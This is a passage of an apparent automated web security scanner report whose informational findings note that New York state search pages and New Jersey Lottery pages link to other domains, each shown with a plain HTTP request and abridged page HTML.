                                           <a href="http://www.erie.gov/" title="Erie County website">Erie County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.Albanycounty.com" title="Visit Albany County Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.Albanycounty.com" title="Albany County website">Albany County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.albanyny.org/" title="Visit City of Albany Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.Albanycounty.com" title="Albany County website">Albany County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.townofalbion.com" title="Visit Town of Albion Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://orleansny.com" title="Orleans County website">Orleans County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.townofalbion-ny.us/" title="Visit Town of Albion Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.co.oswego.ny.us" title="Oswego County website">Oswego County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.vil.albion.ny.us" title="Visit Village of Albion Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://orleansny.com" title="Orleans County website">Orleans County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.alden.erie.gov" title="Visit Town of Alden Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.erie.gov/" title="Erie County website">Erie County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.alexandria-bay.ny.us" title="Visit Village of Alexandria Bay Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.co.jefferson.ny.us/" title="Jefferson County website">Jefferson County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.alfredny.org" title="Visit Village of Alfred Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.alleganyco.com/" title="Allegany County website">Allegany County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.allegany.org" title="Visit Village of Allegany Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.co.cattaraugus.ny.us" title="Cattaraugus County website">Cattaraugus County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.allegany.org" title="Visit Town of Allegany Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.co.cattaraugus.ny.us" title="Cattaraugus County website">Cattaraugus County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.alleganyco.com/" title="Visit Allegany County Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.alleganyco.com/" title="Allegany County website">Allegany County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.altamontvillage.org" title="Visit Village of Altamont Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.Albanycounty.com" title="Albany County website">Albany County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.ameniany.gov" title="Visit Town of Amenia Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.co.dutchess.ny.us" title="Dutchess County website">Dutchess County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.amherst.ny.us" title="Visit Town of Amherst Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.erie.gov/" title="Erie County website">Erie County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.amityville.com/" title="Visit Village of Amityville Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.co.suffolk.ny.us/" title="Suffolk County website">Suffolk County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.townofamsterdam.org" title="Visit Town of Amsterdam Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.co.montgomery.ny.us/" title="Montgomery County website">Montgomery County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.villageofandover.com" title="Visit Village of Andover Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.alleganyco.com/" title="Allegany County website">Allegany County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.angelica-ny.com" title="Visit Village of Angelica Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.alleganyco.com/" title="Allegany County website">Allegany County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.villageofangola.org" title="Visit Village of Angola Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.erie.gov/" title="Erie County website">Erie County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://townofannsville.org" title="Visit Town of Annsville Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.oneidacounty.org" title="Oneida County website">Oneida County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://villageofantwerp.net/" title="Visit Village of Antwerp Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.co.jefferson.ny.us/" title="Jefferson County website">Jefferson County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://villageofarcade.org/" title="Visit Village of Arcade Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.wyomingco.net/" title="Wyoming County website">Wyoming County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.wyomingco.net/towns/townofarcade.htm" title="Visit Town of Arcade Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.wyomingco.net/" title="Wyoming County website">Wyoming County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.ardsleyvillage.com" title="Visit Village of Ardsley Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.westchestergov.com/" title="Westchester County website">Westchester County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.argyleny.com" title="Visit Town of Argyle Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.co.washington.ny.us" title="Washington County website">Washington County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.townofarietta.com" title="Visit Town of Arietta Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://hamiltoncounty.com" title="Hamilton County website">Hamilton County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.arkportvillage.com" title="Visit Village of Arkport Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.steubencony.org/" title="Steuben County website">Steuben County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.asharoken.com/" title="Visit Village of Asharoken Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.co.suffolk.ny.us/" title="Suffolk County website">Suffolk County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.vofab.org" title="Visit Village of Atlantic Beach Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.nassaucountyny.gov/" title="Nassau County website">Nassau County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://attica.org" title="Visit Village of Attica Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.wyomingco.net/" title="Wyoming County website">Wyoming County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.wyomingco.net/towns/townofattica.htm" title="Visit Town of Attica Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.wyomingco.net/" title="Wyoming County website">Wyoming County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://ci.auburn.ny.us" title="Visit City of Auburn Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.co.cayuga.ny.us/" title="Cayuga County website">Cayuga County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://co.cayuga.ny.us/aurelius/" title="Visit Town of Aurelius Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.co.cayuga.ny.us/" title="Cayuga County website">Cayuga County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://co.cayuga.ny.us/aurora/" title="Visit Village of Aurora Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.co.cayuga.ny.us/" title="Cayuga County website">Cayuga County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.townofaurora.com" title="Visit Town of Aurora Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.erie.gov/" title="Erie County website">Erie County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.austerlitzny.com" title="Visit Town of Austerlitz Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.columbiacountyny.com/" title="Columbia County website">Columbia County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://townofava.org" title="Visit Town of Ava Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.oneidacounty.org" title="Oneida County website">Oneida County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.avon-ny.org/TownofAvon" title="Visit Town of Avon Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.co.livingston.state.ny.us/" title="Livingston County website">Livingston County</a>
...[SNIP]...
<img src="images/smallDiamond.gif" alt=" " width="9" height="9" border="0">&nbsp;                
                                   <a href="http://www.avon-ny.org/VillageofAvon/" title="Visit Village of Avon Website"><!--DNT_BEGIN-->
...[SNIP]...
<td>
                                       
                                           <a href="http://www.co.livingston.state.ny.us/" title="Livingston County website">Livingston County</a>
...[SNIP]...
<td align="right" colspan="2" class="bottomgrid" style="color:#DEDEDC" valign="bottom">
               <a href="http://www.ny.gov" title="NYS Home Page" style="text-decoration:none;"><img src="frameparts/nyshome.gif" alt="NYS Home Page" width="79" height="6" align="bottom" style="border:none;">
...[SNIP]...
</a>
               |
               <a href="http://www.ny.gov/contactus/index.html" title="Contact Us"><img src="frameparts/contactus.gif" alt="Contact Us" width="62" height="6" align="bottom" style="border:none;"></a>
               |
               <a href="http://www.ny.gov/privacy/index.html" title="Privacy Policy"><img src="frameparts/privacypolicy.gif" width="79" height="6" align="bottom" alt="Privacy Policy" style="border:none;"></a>
               |
               <a href="http://www.ny.gov/disclaimer/index.html" title="Disclaimer"><img src="frameparts/disclaimer.gif" width="57" height="6" alt="Disclaimer" align="bottom" style="border:none;">
...[SNIP]...

12.18. http://www.search.state.ny.us/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.search.state.ny.us
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?access=p&sort=date%3AD%3AL%3Ad1&output=xml_no_dtd&site=default_collection&client=nystate_frontend&proxystylesheet=nystate_frontend&proxycustom=<ADVANCED/> HTTP/1.1
Host: www.search.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Connection: Close
Content-Type: text/html
Cache-Control: public, max-age=31622400
Expires: Fri, 13 Jul 2012 01:50:17 GMT
Content-Length: 32574

<html><head>
<link rel="STYLESHEET" type="text/css" href="http://www.nysegov.com/wireframe.css" media="screen">
<link rel="STYLESHEET" type="text/css" href="http://www.nysegov.com/nysbanner.css" media="screen"><script language="JavaScript" type="text/javascript" src="http://www.nysegov.com/leftMenu.js"></script>
...[SNIP]...
<body onload="setFocus()" dir="ltr"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
<div style="height: 28px; background-color: #003366;border:#999 1px solid;width:754px ">
<a href="http://www.ny.gov/"><img style="float: left; border:none;" src="http://www.ny.gov/nysbannerpics/banner_img1.png"
alt="NY.gov Portal" />
</a>
<a href="http://www.nysegov.com/citGuide.cfm?superCat=102&amp;cat=449&amp;content=main"><img style="float: left;border:none;"
src="http://www.ny.gov/nysbannerpics/banner_img2.png" alt="State Agency Listing" />
</a>
...[SNIP]...
<a href="#" onclick="document.getElementById('sw_searchbox').style.visibility= 'visible'; document.getElementById('searchgraphic').style.visibility=
'hidden';"><img id="searchgraphic" style="float: right; border:none;visibility: hidden;" src="http://www.ny.gov/nysbannerpics/banner_img3.png"
alt="Search all of NY.gov" />
</a>
...[SNIP]...
<td colspan="2" class="topgrid" align="right"><img src="http://www.nysegov.com/tops/2leveltop_2.gif" width="555" height="70"
alt="New York Vista" />
</td>
...[SNIP]...
<input value="default_collection" name="site" type="hidden"><a href="http://www.nysegov.com/citGuide.cfm?superCat=28" onmouseover="changeImages('pg2slice_03', 'http://www.nysegov.com/images/pg2slice_03-over.gif'); return true;" onmouseout="changeImages('pg2slice_03', 'http://www.nysegov.com/images/pg2slice_03.gif'); return true;" onmousedown="changeImages('pg2slice_03', 'http://www.nysegov.com/images/pg2slice_03-over.gif'); return true;" onmouseup="changeImages('pg2slice_03', 'http://www.nysegov.com/images/pg2slice_03-over.gif'); return true;"><img name="pg2slice_03" src="http://www.nysegov.com/images/pg2slice_03.gif" width="188" height="19" border="0" alt="Business"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=64" onmouseover="changeImages('pg2slice_04', 'http://www.nysegov.com/images/pg2slice_04-over.gif'); return true;" onmouseout="changeImages('pg2slice_04', 'http://www.nysegov.com/images/pg2slice_04.gif'); return true;" onmousedown="changeImages('pg2slice_04', 'http://www.nysegov.com/images/pg2slice_04-over.gif'); return true;" onmouseup="changeImages('pg2slice_04', 'http://www.nysegov.com/images/pg2slice_04-over.gif'); return true;"><img name="pg2slice_04" src="http://www.nysegov.com/images/pg2slice_04.gif" width="188" height="18" border="0" alt="Education"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=82" onmouseover="changeImages('pg2slice_05', 'http://www.nysegov.com/images/pg2slice_05-over.gif'); return true;" onmouseout="changeImages('pg2slice_05', 'http://www.nysegov.com/images/pg2slice_05.gif'); return true;" onmousedown="changeImages('pg2slice_05', 'http://www.nysegov.com/images/pg2slice_05-over.gif'); return true;" onmouseup="changeImages('pg2slice_05', 'http://www.nysegov.com/images/pg2slice_05-over.gif'); return true;"><img name="pg2slice_05" src="http://www.nysegov.com/images/pg2slice_05.gif" width="188" height="19" border="0" alt="Family"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=106" onmouseover="changeImages('pg2slice_06', 'http://www.nysegov.com/images/pg2slice_06-over.gif'); return true;" onmouseout="changeImages('pg2slice_06', 'http://www.nysegov.com/images/pg2slice_06.gif'); return true;" onmousedown="changeImages('pg2slice_06', 'http://www.nysegov.com/images/pg2slice_06-over.gif'); return true;" onmouseup="changeImages('pg2slice_06', 'http://www.nysegov.com/images/pg2slice_06-over.gif'); return true;"><img name="pg2slice_06" src="http://www.nysegov.com/images/pg2slice_06.gif" width="188" height="16" border="0" alt="Health"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=129" onmouseover="changeImages('pg2slice_09', 'http://www.nysegov.com/images/pg2slice_09-over.gif'); return true;" onmouseout="changeImages('pg2slice_09', 'http://www.nysegov.com/images/pg2slice_09.gif'); return true;" onmousedown="changeImages('pg2slice_09', 'http://www.nysegov.com/images/pg2slice_09-over.gif'); return true;" onmouseup="changeImages('pg2slice_09', 'http://www.nysegov.com/images/pg2slice_09-over.gif'); return true;"><img name="pg2slice_09" src="http://www.nysegov.com/images/pg2slice_09.gif" width="188" height="18" border="0" alt="Law and Order"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=245" onmouseover="changeImages('pg2slice_10', 'http://www.nysegov.com/images/pg2slice_10-over.gif'); return true;" onmouseout="changeImages('pg2slice_10', 'http://www.nysegov.com/images/pg2slice_10.gif'); return true;" onmousedown="changeImages('pg2slice_10', 'http://www.nysegov.com/images/pg2slice_10-over.gif'); return true;" onmouseup="changeImages('pg2slice_10', 'http://www.nysegov.com/images/pg2slice_10-over.gif'); return true;"><img name="pg2slice_10" src="http://www.nysegov.com/images/pg2slice_10.gif" width="188" height="19" border="0" alt="Consumer Info"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=396" onmouseover="changeImages('pg2slice_11', 'http://www.nysegov.com/images/pg2slice_11-over.gif'); return true;" onmouseout="changeImages('pg2slice_11', 'http://www.nysegov.com/images/pg2slice_11.gif'); return true;" onmousedown="changeImages('pg2slice_11', 'http://www.nysegov.com/images/pg2slice_11-over.gif'); return true;" onmouseup="changeImages('pg2slice_11', 'http://www.nysegov.com/images/pg2slice_11-over.gif'); return true;"><img name="pg2slice_11" src="http://www.nysegov.com/images/pg2slice_11.gif" width="188" height="18" border="0" alt="Environment"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=102" onmouseover="changeImages('pg2slice_12', 'http://www.nysegov.com/images/pg2slice_12-over.gif'); return true;" onmouseout="changeImages('pg2slice_12', 'http://www.nysegov.com/images/pg2slice_12.gif'); return true;" onmousedown="changeImages('pg2slice_12', 'http://www.nysegov.com/images/pg2slice_12-over.gif'); return true;" onmouseup="changeImages('pg2slice_12', 'http://www.nysegov.com/images/pg2slice_12-over.gif'); return true;"><img name="pg2slice_12" src="http://www.nysegov.com/images/pg2slice_12.gif" width="188" height="18" border="0" alt="Government"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=119" onmouseover="changeImages('pg2slice_13', 'http://www.nysegov.com/images/pg2slice_13-over.gif'); return true;" onmouseout="changeImages('pg2slice_13', 'http://www.nysegov.com/images/pg2slice_13.gif'); return true;" onmousedown="changeImages('pg2slice_13', 'http://www.nysegov.com/images/pg2slice_13-over.gif'); return true;" onmouseup="changeImages('pg2slice_13', 'http://www.nysegov.com/images/pg2slice_13-over.gif'); return true;"><img name="pg2slice_13" src="http://www.nysegov.com/images/pg2slice_13.gif" width="188" height="18" border="0" alt="Housing"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=219" onmouseover="changeImages('pg2slice_14', 'http://www.nysegov.com/images/pg2slice_14-over.gif'); return true;" onmouseout="changeImages('pg2slice_14', 'http://www.nysegov.com/images/pg2slice_14.gif'); return true;" onmousedown="changeImages('pg2slice_14', 'http://www.nysegov.com/images/pg2slice_14-over.gif'); return true;" onmouseup="changeImages('pg2slice_14', 'http://www.nysegov.com/images/pg2slice_14-over.gif'); return true;"><img name="pg2slice_14" src="http://www.nysegov.com/images/pg2slice_14.gif" width="188" height="18" border="0" alt="Transportation"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=36" onmouseover="changeImages('pg2slice_15', 'http://www.nysegov.com/images/pg2slice_15-over.gif'); return true;" onmouseout="changeImages('pg2slice_15', 'http://www.nysegov.com/images/pg2slice_15.gif'); return true;" onmousedown="changeImages('pg2slice_15', 'http://www.nysegov.com/images/pg2slice_15-over.gif'); return true;" onmouseup="changeImages('pg2slice_15', 'http://www.nysegov.com/images/pg2slice_15-over.gif'); return true;"><img name="pg2slice_15" src="http://www.nysegov.com/images/pg2slice_15.gif" width="188" height="18" border="0" alt="Career / Employment"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=142" onmouseover="changeImages('pg2slice_16', 'http://www.nysegov.com/images/pg2slice_16-over.gif'); return true;" onmouseout="changeImages('pg2slice_16', 'http://www.nysegov.com/images/pg2slice_16.gif'); return true;" onmousedown="changeImages('pg2slice_16', 'http://www.nysegov.com/images/pg2slice_16-over.gif'); return true;" onmouseup="changeImages('pg2slice_16', 'http://www.nysegov.com/images/pg2slice_16-over.gif'); return true;"><img name="pg2slice_16" src="http://www.nysegov.com/images/pg2slice_16.gif" width="188" height="17" border="0" alt="Licenses &amp; Credentials"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=178" onmouseover="changeImages('pg2slice_17', 'http://www.nysegov.com/images/pg2slice_17-over.gif'); return true;" onmouseout="changeImages('pg2slice_17', 'http://www.nysegov.com/images/pg2slice_17.gif'); return true;" onmousedown="changeImages('pg2slice_17', 'http://www.nysegov.com/images/pg2slice_17-over.gif'); return true;" onmouseup="changeImages('pg2slice_17', 'http://www.nysegov.com/images/pg2slice_17-over.gif'); return true;"><img name="pg2slice_17" src="http://www.nysegov.com/images/pg2slice_17.gif" width="188" height="20" border="0" alt="Recreation / Tourism"></a><br><a href="http://www.nysegov.com/citGuide.cfm?superCat=212" onmouseover="changeImages('pg2slice_18', 'http://www.nysegov.com/images/pg2slice_18-over.gif'); return true;" onmouseout="changeImages('pg2slice_18', 'http://www.nysegov.com/images/pg2slice_18.gif'); return true;" onmousedown="changeImages('pg2slice_18', 'http://www.nysegov.com/images/pg2slice_18-over.gif'); return true;" onmouseup="changeImages('pg2slice_18', 'http://www.nysegov.com/images/pg2slice_18-over.gif'); return true;"><img name="pg2slice_18" src="http://www.nysegov.com/images/pg2slice_18.gif" width="188" height="19" border="0" alt="Tax Information"></a><br><a href="http://www.ny.gov/howdoi/index.html" onMouseOver="changeImages('pg2slice_18a', 'http://www.ny.gov/images/pg2slice_18b-over.gif'); return true;" onMouseOut="changeImages('pg2slice_18a', 'http://www.ny.gov/images/pg2slice_18a.gif'); return true;"><img id="pg2slice_18a" src="http://www.ny.gov/images/pg2slice_18a.gif" height="19" width="188" alt="How Do I?" border="0"></a><br><a href="http://www.nysegov.com/webcast.cfm" onMouseOver="changeImages('webcastLinkImage','http://www.nysegov.com/images/webCastLink_over.gif'); return true;" onMouseOut="changeImages('webcastLinkImage', 'http://www.nysegov.com/images/webCastLink.gif'); return true;"><img id="webcastLinkImage" src="http://www.nysegov.com/images/webCastLink.gif" height="19" width="188" alt="Open Meeting Webcast" border="0"></a><div class="searchArea"><img src="http://www.nysegov.com/images/searchnys_2005.gif" alt="Search" width="122" height="11" style="border:none"><br>
...[SNIP]...
p&amp;sort=date%3AD%3AL%3Ad1&amp;output=xml_no_dtd&amp;site=default_collection&amp;client=default_frontend&amp;proxystylesheet=default_frontend&amp;proxycustom=%3cADVANCED/%3e" title="Advanced Search"><img src="http://www.nysegov.com/images/advancesearch_2005.gif" width="101" height="11" alt="" border="0"></a><a class="menuLink" title="Help" href="http://www.nysegov.com/searchtips.cfm"><img src="http://www.nysegov.com/images/advancesearchhelp_2005.gif" width="27" height="11" alt="" border="0"></a>
...[SNIP]...
<td align="right" colspan = "2" class="bottomgrid" style="color:#DEDEDC" valign="bottom">
           <a href="http://www.cio.ny.gov/" title="NYS OFT" style="background-color:#516D8B;color:white;text-decoration:none;">
       Search provided by NYS Office for Technology</a>
       |    
       <a href="http://www.ny.gov" title="NYS Home Page" style="background-color:#516D8B;color:white;text-decoration:none;">NYS
Home Page</a>
       |        
       <a href="http://www.ny.gov/contactus/index.html" title="Contact Us" style="background-color:#516D8B;color:white;text-decoration:none;">Contact
Us</a>
       |
       <a href="http://www.ny.gov/privacy/index.html" title="Privacy Policy" style="background-color:#516D8B;color:white;text-decoration:none;">Privacy
Policy</a>
       |
       <a href="http://www.ny.gov/disclaimer/index.html" title="Disclaimer" style="background-color:#516D8B;color:white;text-decoration:none;">Disclaimer</a>
...[SNIP]...

12.19. http://www.state.nj.us/lottery/about/6-0_about.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/about/6-0_about.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lottery/about/6-0_about.htm?1 HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:25 GMT
Content-length: 48579
Content-type: text/html
Last-modified: Fri, 01 Jul 2011 11:52:45 GMT
Etag: "bdc3-4e0db50d"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
<!-- recommend actual Google key above for http://www.google.com/jsapi?key=notsupplied-wizard eg. key=ABQIAAAAbUMZpgu0YQY_aibXGuUQJRTzdxXgoSUQC5hpDNzCebWbJx0pYBRqXnGyxoWbBs0pypGYlW46fcH6QQ -->
<script src="http://www.google.com/uds/solutions/dynamicfeed/gfdynamicfeedcontrol.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../style/internal.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.1/jquery-ui.min.js"></script>
...[SNIP]...
<p align="center">
   <a href="http://maps.google.com/maps?q=One+Lawrence+Park+Complex+Brunswick+Avenue+Circle+Lawrenceville,+NJ+08648&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=wl" target="_blank"><img src="../images/about/contact_map.gif" height="259" width="328">
...[SNIP]...
<strong>If you think you or someone you know has a gambling problem, help is available in New Jersey 24 hour a day...every day! Call <a href="http://www.800gambler.org/" target="_blank"><u>
...[SNIP]...
<div class="facebook-feed">
<a class="clear-link" href="http://www.facebook.com/NewJerseyLottery"></a>
...[SNIP]...
</div>
<a href="http://twitter.com/#!/TheNJLottery"><img class="twitter" src="../images/sitewide/icon-twitter.png" width="61" height="76" alt="Twitter" />
...[SNIP]...
<br />
<a href="http://www.youtube.com/newjerseylottery"><img class="youtube" src="../images/sitewide/icon-youtube.png" width="61" height="79" alt="YouTube" />
...[SNIP]...

12.20. http://www.state.nj.us/lottery/didiwin/8-0_did_i_win.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.state.nj.us
Path:   /lottery/didiwin/8-0_did_i_win.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lottery/didiwin/8-0_did_i_win.htm?1 HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:28 GMT
Content-length: 20646
Content-type: text/html
Last-modified: Tue, 12 Jul 2011 15:29:01 GMT
Etag: "50a6-4e1c683d"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google.com/jsapi?key=notsupplied-wizard" type="text/javascript"></script>
